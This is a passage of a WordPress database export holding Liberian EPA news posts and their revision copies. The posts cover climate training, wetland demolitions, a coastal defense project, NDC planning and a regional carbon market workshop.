19:18:48','',5425,'https://ekmsliberia.info/wp-content/uploads/2025/05/Ty.jpeg',0,'attachment','image/jpeg',0),(5427,38,'2025-05-20 19:19:53','2025-05-20 19:19:53','<!-- wp:paragraph -->\n<p>Chiang Mai, Thailand – Two employees of the Environmental Protection Agency (EPA) of Liberia are currently participating in a major international training course on climate change in Thailand. The program, titled “Climate Change Mitigation &amp; Adaptation: Pathways for Sustainable Development,” brings together participants from around the world to explore practical solutions to the growing climate crisis.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Liberian representatives are Victoria Jones, Head Inspector for the EPA’s Compliance and Enforcement Department in Margibi County, and Timothy R. Yoko, Administrative Assistant and Chief of Office Staff to the Executive Director.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-week training, running from May 19 to 30, 2025, is being held at the Environmental Science Research Center, Faculty of Science, Chiang Mai University, in northern Thailand.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The course is designed to help developing countries like Liberia better understand and respond to climate change, especially through mitigation (reducing the causes of climate change) and adaptation (dealing with its current effects). It includes lectures, workshops, and field visits to successful Thai projects, such as smart farming systems and renewable energy models.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants are learning how to:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Calculate greenhouse gas (GHG) emissions,</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Build local climate action plans,</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Design policies that fit their community needs.</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>On the final day, all trainees will present a draft adaptation policy based on what they’ve learned — a key step in bringing new ideas back to their home countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA says the training is vital for Liberia’s fight against climate change. As one of the countries most vulnerable to climate impacts like flooding, sea-level rise, and changing weather patterns, Liberia stands to benefit greatly from practical knowledge and international collaboration.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With this training, Jones and Yoko are expected to help strengthen Liberia’s climate response and support the nation’s path toward sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','Two EPA Liberia Employees Join Global Climate Change Training in Thailand','','inherit','closed','closed','','5425-revision-v1','','','2025-05-20 19:19:53','2025-05-20 19:19:53','',5425,'https://ekmsliberia.info/?p=5427',0,'revision','',0),(5428,38,'2025-05-20 19:26:31','2025-05-20 19:26:31','<!-- wp:paragraph -->\n<p>Johnsonville, Liberia – May 20, 2025_The Environmental Protection Agency (EPA) of Liberia, led by Executive Director Dr. Emmanuel K. Urey Yarkpawolo, has intensified its fight against illegal construction in wetlands with a fresh round of demolitions in Johnsonville and Jacob Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tuesday’s operation, carried out under the mandate of Executive Order 143, targeted structures unlawfully erected by Chinese developers who were warned but continued work under the cover of darkness. The Presidential Executive Order established a Taskforce Against the Encroachment on Beachfronts and Waterways, made up of key government institutions including the Ministry of Public Works, the Liberia Land Authority, the Ministry of Mines and Energy, and local city corporations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking to the media at one of the most damaged sites in Johnsonville, Dr. Yarkpawolo expressed frustration that despite previous stop orders, developers blatantly violated Liberia’s environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“When this backfilling started, I personally came here and instituted a halt order,” Dr. Yarkpawolo said. “But the Chinese continued to backfill at night. We’re here today to send a strong message: these actions will not go unchecked.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The site is near several schools, including the Multee International School System, and residents have reported worsening flooding as a result of the altered landscape.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just illegal — it’s dangerous,” Dr. Yarkpawolo stressed. “We cannot allow individuals or companies, whether Liberian or foreign, to destroy our wetlands and put entire communities at risk.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He clarified that land ownership does not give anyone the right to build without an environmental permit, which is required for any development project, including excavation and dirt transportation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Whether you’re building on dry land or swamp, you need a permit,” he said. “Section 75 of the Environmental Protection and Management Law strictly prohibits draining, blocking, or building in wetlands.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo confirmed that Ruixu Commercial Concrete, the Chinese company responsible for the damage, was never issued an environmental permit. As a result, their structures are being demolished in line with the law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA CEO also called on truck drivers to stop being accomplices in the illegal backfilling of wetlands. Dr. Yarkpawolo said any transportation of dirt for development purposes requires two permits — one for the site being excavated and another for where the dirt is being dumped.<br>He urged the Truck Drivers Union and the Ministry of Transport to enforce these rules more strictly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA issued a strong warning to both Liberians and foreigners:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Do not backfill or build in wetlands;</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Always consult the EPA before altering natural environments;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true,\"start\":2} -->\n<ol start=\"2\"><!-- wp:list-item -->\n<li>Report any suspicious construction activity near water bodies.</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>“We are serious. We are not backing down,” Dr. Yarkpawolo added. “Liberia’s environment is not for sale. We are protecting it for our children and their children.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to upholding Liberia’s environmental laws and protecting critical ecosystems for the future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','Backed by Executive Order, EPA Dismantles Chinese-Backed Illegal Wetland Projects.','','publish','open','open','','backed-by-executive-order-epa-dismantles-chinese-backed-illegal-wetland-projects','','','2025-05-20 19:26:34','2025-05-20 19:26:34','',0,'https://ekmsliberia.info/?p=5428',63,'post','',0),(5429,38,'2025-05-20 19:24:45','2025-05-20 19:24:45','','b80f741a-5bbe-4813-ac8e-49d47fc72a0f','','inherit','open','closed','','b80f741a-5bbe-4813-ac8e-49d47fc72a0f','','','2025-05-20 19:24:45','2025-05-20 19:24:45','',5428,'https://ekmsliberia.info/wp-content/uploads/2025/05/b80f741a-5bbe-4813-ac8e-49d47fc72a0f.jpeg',0,'attachment','image/jpeg',0),(5430,38,'2025-05-20 19:26:31','2025-05-20 19:26:31','<!-- wp:paragraph -->\n<p>Johnsonville, Liberia – May 20, 2025_The Environmental Protection Agency (EPA) of Liberia, led by Executive Director Dr. Emmanuel K. Urey Yarkpawolo, has intensified its fight against illegal construction in wetlands with a fresh round of demolitions in Johnsonville and Jacob Town.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tuesday’s operation, carried out under the mandate of Executive Order 143, targeted structures unlawfully erected by Chinese developers who were warned but continued work under the cover of darkness. The Presidential Executive Order established a Taskforce Against the Encroachment on Beachfronts and Waterways, made up of key government institutions including the Ministry of Public Works, the Liberia Land Authority, the Ministry of Mines and Energy, and local city corporations.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking to the media at one of the most damaged sites in Johnsonville, Dr. Yarkpawolo expressed frustration that despite previous stop orders, developers blatantly violated Liberia’s environmental laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“When this backfilling started, I personally came here and instituted a halt order,” Dr. Yarkpawolo said. “But the Chinese continued to backfill at night. We’re here today to send a strong message: these actions will not go unchecked.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The site is near several schools, including the Multee International School System, and residents have reported worsening flooding as a result of the altered landscape.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is not just illegal — it’s dangerous,” Dr. Yarkpawolo stressed. “We cannot allow individuals or companies, whether Liberian or foreign, to destroy our wetlands and put entire communities at risk.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He clarified that land ownership does not give anyone the right to build without an environmental permit, which is required for any development project, including excavation and dirt transportation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Whether you’re building on dry land or swamp, you need a permit,” he said. “Section 75 of the Environmental Protection and Management Law strictly prohibits draining, blocking, or building in wetlands.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo confirmed that Ruixu Commercial Concrete, the Chinese company responsible for the damage, was never issued an environmental permit. As a result, their structures are being demolished in line with the law.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA CEO also called on truck drivers to stop being accomplices in the illegal backfilling of wetlands. Dr. Yarkpawolo said any transportation of dirt for development purposes requires two permits — one for the site being excavated and another for where the dirt is being dumped.<br>He urged the Truck Drivers Union and the Ministry of Transport to enforce these rules more strictly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA issued a strong warning to both Liberians and foreigners:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>Do not backfill or build in wetlands;</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Always consult the EPA before altering natural environments;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true,\"start\":2} -->\n<ol start=\"2\"><!-- wp:list-item -->\n<li>Report any suspicious construction activity near water bodies.</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>“We are serious. We are not backing down,” Dr. Yarkpawolo added. “Liberia’s environment is not for sale. We are protecting it for our children and their children.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA reaffirmed its commitment to upholding Liberia’s environmental laws and protecting critical ecosystems for the future.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-30-</p>\n<!-- /wp:paragraph -->','Backed by Executive Order, EPA Dismantles Chinese-Backed Illegal Wetland Projects.','','inherit','closed','closed','','5428-revision-v1','','','2025-05-20 19:26:31','2025-05-20 19:26:31','',5428,'https://ekmsliberia.info/?p=5430',0,'revision','',0),(5431,38,'2025-05-20 19:45:37','2025-05-20 19:45:37','','7828d91f-2287-4db7-9a8d-5e290c7b43c5','','inherit','open','closed','','7828d91f-2287-4db7-9a8d-5e290c7b43c5','','','2025-05-20 19:45:37','2025-05-20 19:45:37','',5420,'https://ekmsliberia.info/wp-content/uploads/2025/05/7828d91f-2287-4db7-9a8d-5e290c7b43c5.jpeg',0,'attachment','image/jpeg',0),(5432,38,'2025-05-20 19:46:22','2025-05-20 19:46:22','<!-- wp:paragraph -->\n<p>Greenville, Sinoe County, May 15, 2025 — The Government of Liberia, through the Environmental Protection Agency (EPA), has officially broken ground for a major coastal defense project in Greenville, Sinoe County, aimed at protecting the city from the devastating effects of sea erosion. The groundbreaking ceremony took place on Tuesday, March 13, 2025, at the Greenville Administrative Building.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The initiative, known as the Sinoe County Coastal Defense Project, carries a total cost of $20.4 million USD. It is being funded through a partnership between the Global Environment Facility (GEF), the United Nations Development Programme (UNDP), and the Government of Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, EPA Executive Director Dr. Emmanuel K. Urey Yarkpawolo underscored the urgency of the project, noting that the advancing sea poses a serious threat to Greenville.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Greenville is being washed away by the sea,” Dr. Yarkpawolo warned. “This project will help protect lives, properties, and the future of this city.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the project includes the construction of a rock revetment along the shoreline, with the necessary rocks to be sourced from the nearby Bana community. Liberia’s contribution includes the provision of these rocks at no cost, while GEF and UNDP are committing approximately $9.1 million in direct funding.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":4438} -->\n<figure class=\"wp-block-image\"><img src=\"https://epa.gov.lr/wp-content/uploads/2025/05/42b2fa05-462e-4b19-9289-081cf907558d-1024x576.jpeg\" alt=\"\" class=\"wp-image-4438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo revealed that the project, while officially launched now, began technically in October 2022 and will run through August 2028. Foundational activities—such as environmental and social impact assessments, mapping of vulnerable zones, and contract signings—have already been completed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The required machinery has already arrived in the Bana community. Contracts for rock excavation and equipment rental have been signed. We’re on the move,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that a Memorandum of Understanding with the Bana community ensures that at least 50% of the workers hired for the project will come from the local population—empowering the very people most affected.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he cautioned that while progress has been made, funding gaps remain. He disclosed that the initial project budget did not include compensation for the host community or local laborers. A request for $350,000 was submitted to the Ministry of Finance but was not approved.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We’re appealing to the lawmakers of Sinoe County to advocate for this in the next national budget review. If we don’t secure additional support, the project may suffer delays or even risk donor withdrawal,” Dr. Yarkpawolo warned.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sinoe County Superintendent Peter Wleh Nyensuah welcomed the attendees and hailed the project as one of the most significant development undertakings for the county in recent history.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“This is a big achievement not only for the people of Greenville but for the entire Republic of Liberia. Sea erosion has robbed our people of land, livelihood, and peace of mind. This project restores hope,” he said. “The EPA, our international partners, and the people of Bana have shown what partnership can do. We must now rally our collective strength to see this through.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Superintendent Nyensuah also praised the community’s willingness to cooperate and encouraged transparency, collaboration, and local oversight to ensure smooth implementation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Sinoe County Senator Augistine S. Chea, who attended the event, reaffirmed the Legislature’s commitment to ensuring that the EPA receives the necessary support to close funding gaps.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The people of Bana deserve more than just gratitude—they deserve recognition and compensation for their role in safeguarding our coastal cities,” Senator Chea said. “The Sinoe Legislative Caucus will work with the EPA to ensure that the $350,000 requested is inserted in the upcoming national budget. This is not a favor—it’s a duty.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that the government must take ownership of climate resilience initiatives, stating that this project must serve as a model for other counties.</p>\n<!-- /wp:paragraph -->','Government Breaks Ground for Coastal Defense Project in Sinoe to Curb Sea Erosion','','inherit','closed','closed','','5420-revision-v1','','','2025-05-20 19:46:22','2025-05-20 19:46:22','',5420,'https://ekmsliberia.info/?p=5432',0,'revision','',0),(5433,38,'2025-05-22 22:08:25','2025-05-22 22:08:25','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia on Thursday welcomed Hon. Augustine Kpehe Ngafuan II, Minister of Finance and Development Planning, along with his delegation, as part of the ongoing \"Deep Dives\" initiative spearheaded by the government. The visit marked a significant step toward fostering stronger inter-agency collaboration and improving service delivery across sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Receiving the Minister and his team at the EPA headquarters, Executive Director Dr. Emmanuel Urey Yarkpawolo expressed appreciation for the Ministry’s commitment to deepening coordination with key institutions. He emphasized the importance of aligning fiscal planning with the country’s environmental priorities to ensure sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The \"Deep Dives\" sessions, led by the Ministry of Finance and Development Planning (MFDP), are designed to assess institutional challenges, identify strategic priorities, and enhance the efficiency of public sector delivery. During the engagement, EPA officials provided a comprehensive overview of ongoing programs, budgetary needs, and environmental interventions aimed at addressing pollution, climate change, and biodiversity conservation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan, for his part, reaffirmed the Ministry\'s dedication to supporting agencies like the EPA in achieving their mandates. He stressed the importance of integrating environmental concerns into national development planning and pledged to work closely with the EPA to ensure that adequate resources are mobilized for critical environmental programs.</p>\n<!-- /wp:paragraph -->','EPA Welcomes Finance Minister Ngafuan for “Deep Dives” Session, Strengthens Inter-Agency Collaboration for Sustainable Development','','publish','open','open','','epa-welcomes-finance-minister-ngafuan-for-deep-dives-session-strengthens-inter-agency-collaboration-for-sustainable-development','','','2025-05-22 22:08:28','2025-05-22 22:08:28','',0,'https://ekmsliberia.info/?p=5433',62,'post','',0),(5434,38,'2025-05-22 22:07:21','2025-05-22 22:07:21','','1bd26c9a-97da-444b-bce0-a9e60c855b56','','inherit','open','closed','','1bd26c9a-97da-444b-bce0-a9e60c855b56','','','2025-05-22 22:07:21','2025-05-22 22:07:21','',5433,'https://ekmsliberia.info/wp-content/uploads/2025/05/1bd26c9a-97da-444b-bce0-a9e60c855b56.jpeg',0,'attachment','image/jpeg',0),(5435,38,'2025-05-22 22:08:25','2025-05-22 22:08:25','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia on Thursday welcomed Hon. Augustine Kpehe Ngafuan II, Minister of Finance and Development Planning, along with his delegation, as part of the ongoing \"Deep Dives\" initiative spearheaded by the government. The visit marked a significant step toward fostering stronger inter-agency collaboration and improving service delivery across sectors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Receiving the Minister and his team at the EPA headquarters, Executive Director Dr. Emmanuel Urey Yarkpawolo expressed appreciation for the Ministry’s commitment to deepening coordination with key institutions. He emphasized the importance of aligning fiscal planning with the country’s environmental priorities to ensure sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The \"Deep Dives\" sessions, led by the Ministry of Finance and Development Planning (MFDP), are designed to assess institutional challenges, identify strategic priorities, and enhance the efficiency of public sector delivery. During the engagement, EPA officials provided a comprehensive overview of ongoing programs, budgetary needs, and environmental interventions aimed at addressing pollution, climate change, and biodiversity conservation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Minister Ngafuan, for his part, reaffirmed the Ministry\'s dedication to supporting agencies like the EPA in achieving their mandates. He stressed the importance of integrating environmental concerns into national development planning and pledged to work closely with the EPA to ensure that adequate resources are mobilized for critical environmental programs.</p>\n<!-- /wp:paragraph -->','EPA Welcomes Finance Minister Ngafuan for “Deep Dives” Session, Strengthens Inter-Agency Collaboration for Sustainable Development','','inherit','closed','closed','','5433-revision-v1','','','2025-05-22 22:08:25','2025-05-22 22:08:25','',5433,'https://ekmsliberia.info/?p=5435',0,'revision','',0),(5436,38,'2025-05-26 06:17:38','2025-05-26 06:17:38','<!-- wp:paragraph -->\n<p>Kakata, Margibi County – May 26, 2025 – The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, is calling on stakeholders to remain realistic and focused as Liberia prepares its updated climate action plan under the Nationally Determined Contributions (NDCs) 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of a two-day NDCs Sectors Prioritization Workshop in Kakata, Margibi County, Dr. Yarkpawolo reminded participants that Liberia contributes only about 0.03% to global greenhouse gas emissions, yet it is one of the countries most affected by the impacts of climate change. He emphasized that while the country remains committed to addressing climate issues, its efforts must match available resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s current goal is to reduce emissions by 64% below business-as-usual levels by 2030. This ambition, he said, should not be raised further. “A 64% target is already bold enough for a country like ours with limited resources,” he said. “We must not go above this limit unless the financial support from our international partners improves.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5437,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/05/f7dac883-df04-4d91-b784-e496c830603c-1024x768.jpeg\" alt=\"\" class=\"wp-image-5437\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo noted that Liberia had made progress under its previous NDCs. A recent stocktake showed a 20.47% reduction in greenhouse gas emissions, even though the promised international financial support was not fully received. He credited this achievement to strong national efforts but said that further gains would require clear priorities and stronger funding commitments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recommended including freshwater ecosystems and land rights as new focus areas in the next NDC plan. He explained that freshwater ecosystems are under threat due to mining activities, especially the illegal use of mercury. Including this area would help protect Liberia’s inland water sources. On land rights, he said Liberia has a good land law on paper, but more must be done to ensure it is put into action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also proposed that gender, youth, children, and other vulnerable groups be included as a cross-cutting issue in the new climate plan. He stressed that addressing the needs and rights of these groups must be part of every climate strategy. Another cross-cutting area he recommended was loss and damage, which is now part of international climate talks and has its own funding system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He made it clear that not including some sectors in the NDCs 3.0 does not mean those sectors will be ignored. Instead, the focus now is on choosing the most urgent and manageable priorities. “We will still work in all sectors,” he said. “But we must begin by focusing on those that will give us the best results now. As we move forward, we can add more sectors in NDCs 4.0.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the participants for their time and urged them to keep the recommendations from the stocktake report in mind as they finalize the new national climate targets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day workshop in Kakata brought together representatives from government agencies, development partners, and the private sector to agree on key sectors for Liberia’s updated climate commitments and is expected to climax on Tuesday, May 27, 2025.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Wants Climate Focus on Freshwater, Land Rights, and Vulnerable Groups','','publish','open','open','','epa-executive-director-wants-climate-focus-on-freshwater-land-rights-and-vulnerable-groups','','','2025-05-27 06:30:38','2025-05-27 06:30:38','',0,'https://ekmsliberia.info/?p=5436',61,'post','',0),(5437,38,'2025-05-27 06:28:04','2025-05-27 06:28:04','','f7dac883-df04-4d91-b784-e496c830603c','','inherit','open','closed','','f7dac883-df04-4d91-b784-e496c830603c','','','2025-05-27 06:28:04','2025-05-27 06:28:04','',5436,'https://ekmsliberia.info/wp-content/uploads/2025/05/f7dac883-df04-4d91-b784-e496c830603c.jpeg',0,'attachment','image/jpeg',0),(5438,38,'2025-05-27 06:29:22','2025-05-27 06:29:22','','New for yesterday','','inherit','open','closed','','new-for-yesterday','','','2025-05-27 06:29:22','2025-05-27 06:29:22','',5436,'https://ekmsliberia.info/wp-content/uploads/2025/05/New-for-yesterday.jpeg',0,'attachment','image/jpeg',0),(5439,38,'2025-05-27 06:30:36','2025-05-27 06:30:36','<!-- wp:paragraph -->\n<p>Kakata, Margibi County – May 26, 2025 – The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, is calling on stakeholders to remain realistic and focused as Liberia prepares its updated climate action plan under the Nationally Determined Contributions (NDCs) 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the opening of a two-day NDCs Sectors Prioritization Workshop in Kakata, Margibi County, Dr. Yarkpawolo reminded participants that Liberia contributes only about 0.03% to global greenhouse gas emissions, yet it is one of the countries most affected by the impacts of climate change. He emphasized that while the country remains committed to addressing climate issues, its efforts must match available resources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s current goal is to reduce emissions by 64% below business-as-usual levels by 2030. This ambition, he said, should not be raised further. “A 64% target is already bold enough for a country like ours with limited resources,” he said. “We must not go above this limit unless the financial support from our international partners improves.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":5437,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2025/05/f7dac883-df04-4d91-b784-e496c830603c-1024x768.jpeg\" alt=\"\" class=\"wp-image-5437\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo noted that Liberia had made progress under its previous NDCs. A recent stocktake showed a 20.47% reduction in greenhouse gas emissions, even though the promised international financial support was not fully received. He credited this achievement to strong national efforts but said that further gains would require clear priorities and stronger funding commitments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recommended including freshwater ecosystems and land rights as new focus areas in the next NDC plan. He explained that freshwater ecosystems are under threat due to mining activities, especially the illegal use of mercury. Including this area would help protect Liberia’s inland water sources. On land rights, he said Liberia has a good land law on paper, but more must be done to ensure it is put into action.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo also proposed that gender, youth, children, and other vulnerable groups be included as a cross-cutting issue in the new climate plan. He stressed that addressing the needs and rights of these groups must be part of every climate strategy. Another cross-cutting area he recommended was loss and damage, which is now part of international climate talks and has its own funding system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He made it clear that not including some sectors in the NDCs 3.0 does not mean those sectors will be ignored. Instead, the focus now is on choosing the most urgent and manageable priorities. “We will still work in all sectors,” he said. “But we must begin by focusing on those that will give us the best results now. As we move forward, we can add more sectors in NDCs 4.0.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He thanked the participants for their time and urged them to keep the recommendations from the stocktake report in mind as they finalize the new national climate targets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day workshop in Kakata brought together representatives from government agencies, development partners, and the private sector to agree on key sectors for Liberia’s updated climate commitments and is expected to climax on Tuesday, May 27, 2025.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Wants Climate Focus on Freshwater, Land Rights, and Vulnerable Groups','','inherit','closed','closed','','5436-revision-v1','','','2025-05-27 06:30:36','2025-05-27 06:30:36','',5436,'https://ekmsliberia.info/?p=5439',0,'revision','',0),(5441,38,'2025-06-02 09:48:00','2025-06-02 09:48:00','<!-- wp:paragraph -->\n<p><strong>DAKAR, Senegal – June 2, 2025</strong> – In a significant move towards fostering regional cooperation in climate action, Dr. Emmanuel K. Urey Yarkpawolo, the Executive Director of Liberia’s Environmental Protection Agency (EPA) and Ambassador to the West African Carbon Alliance and Climate Finance, addressed participants at the West Africa Carbon Market Hub Workshop in Dakar. This event, held at the RIU BAOBAB Hotel, marks the second workshop of its kind, following the inaugural session in Ivory Coast.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop gathered a diverse assembly of ministers, diplomats, and environmental dignitaries from West Africa. It aimed to enhance policymaker capacities and promote collaboration between project developers and service providers. Central to the discussions was the critical importance of Article 6 of the Paris Agreement, designed to facilitate effective benefit-sharing and knowledge exchange in carbon markets.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo underscored the pressing need for regional solidarity in building effective carbon markets, asserting that such alliances are essential for economic sovereignty. \"In an era where multilateralism and international climate finance face significant challenges, it is vital that we strengthen our collaborations to innovate and address poverty in our region,\" he stated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Highlighting Liberia\'s proactive stance, The EPA boss reiterated the commitment of President Joseph N. Boakai, Sr. to engage in carbon trading. This initiative aims to harness carbon credits for the conservation of Liberia’s forests and mangroves, which represent over 40 percent of the remaining forest cover in West Africa. Liberia\'s ambitious five-year developmental strategy, the ARREST Agenda for Inclusive Development (AAID), seeks to generate $8.4 billion, with the EPA tasked with securing a portion of this funding through carbon market initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Executive Director announced Liberia\'s progress towards achieving a 64% reduction in greenhouse gas emissions by 2030 in comparison to business-as-usual scenarios. Despite contributing minimally to global climate change, he mentioned that Liberia faces severe impacts from its effects, leading to a focus on climate adaptation in its revised Nationally Determined Contributions (NDCs) 3.0.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo expressed appreciation for the ongoing support from the West African Alliance and its partners, recognizing their role in bolstering Liberia’s capacity to address climate challenges, particularly with Article 6 of the Paris Agreement.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In concluding his remarks, he called for a comprehensive platform for West African nations to access finance that could drive sustainable development and effective climate actions. He expressed optimism that the outcomes of the workshop would be transformative, highlighting the necessity for carbon pricing mechanisms that accurately reflect the environmental and social values of reduced emissions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With the urgent call for regional collaboration resonating among participants, the West Africa Carbon Market Hub Workshop represents a pivotal step in advancing sustainable development and climate resilience across West 